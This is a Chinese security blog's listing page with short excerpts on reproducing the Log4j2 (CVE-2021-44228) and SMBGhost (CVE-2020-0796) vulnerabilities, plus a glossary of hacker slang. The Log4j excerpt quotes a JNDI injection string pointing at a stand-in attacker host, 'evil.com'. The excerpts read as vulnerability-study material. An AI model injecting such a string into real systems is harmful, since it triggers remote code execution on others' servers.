网络安全
文章平均质量分 68
佟以冬
这个作者很懒,什么都没留下…
展开
-
CVE-2021-44228漏洞复现
此漏洞为log4j2漏洞,log4j2是java语言的日志处理套件,使用很广泛。在2.0到2.14.1版本中存在JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似'${jndi:ldap://evil.com/example}'的参数进行JNDI注入,执行任意代码(注:Java环境1.8也可能会存在)什么是JNDI?原创 2024-05-29 12:38:45 · 2024 阅读 · 1 评论 -
CVE-2020-0796漏洞复现
此漏洞为基于win10 1903基于底层smb的3.1.1版本漏洞("SMB"代表"Server Message Block",是一种用于在计算机之间共享文件、打印机和其他资源的通信协议),此漏洞靶机需开445端口,如未开445端口则无法进行实验。原创 2024-03-13 09:41:56 · 716 阅读 · 0 评论 -
网络安全常用语
webshell就是asp、php、jsp、之外的web代码文件,通过这些代码文件可以执行任意命令,对计算机做任意的操作。0day:使用量非常大的通用产品漏洞已经被发现但还没有公开,官方还没有发布补丁或者修复方法的漏洞。抓鸡:利用出现概率非常高的漏洞(比如log4j、永恒之蓝),使用自动化方式获取肉鸡的行为。1day:漏洞的POC和EXP已经被公开了,但是很多人还来不及修复。拖库:网站被入侵后,黑客把全部数据导出,窃取到了全部数据的数据文件。Nday:已经发布官方补丁的漏洞,并且时间过去很久的漏洞。原创 2023-09-06 13:14:17 · 96 阅读 · 1 评论